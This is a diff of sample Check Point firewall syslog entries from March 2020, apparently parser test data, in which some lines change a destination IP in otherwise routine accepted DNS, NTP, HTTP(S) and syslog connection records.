+<134>1 2020-03-29T17:31:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db82,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503106"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55167"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db82,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58650"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:49Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db85,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; log_delay:"1585503109"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35127"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db87,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503111"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57973"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db87,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503111"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59598"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db87,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503111"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57973"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db87,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503111"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59598"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80db88,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:31:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80db8f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"65136"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:31:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80db8f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48170"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10080"; xlatesrc:"0.0.0.0"]
@@ -3053,7 +3053,7 @@
 <134>1 2020-03-29T17:36:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dc80,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34986"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10092"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:36:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dc80,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40626"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:36:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dc81,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:36:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dc85,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36798"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T17:36:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dc85,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36798"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:36:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dc85,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"62996"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10093"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:36:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dc85,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63383"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:36:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dc85,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37930"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10094"; xlatesrc:"0.0.0.0"]
@@ -3070,7 +3070,7 @@
 <134>1 2020-03-29T17:38:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dcfe,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49459"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:38:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dd00,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:38:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dd01,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:38:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dd03,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50935"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T17:38:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dd03,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50935"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:38:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dd03,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2.21.41.118"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33270"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10095"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:38:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dd03,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59845"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:38:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dd03,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50366"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10096"; xlatesrc:"0.0.0.0"]
@@ -3106,90 +3106,90 @@
 <134>1 2020-03-29T17:41:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddcc,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; log_delay:"1585503692"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32982"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:41:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddcc,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"129.250.35.250"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50175"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:41:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddcf,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34591"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
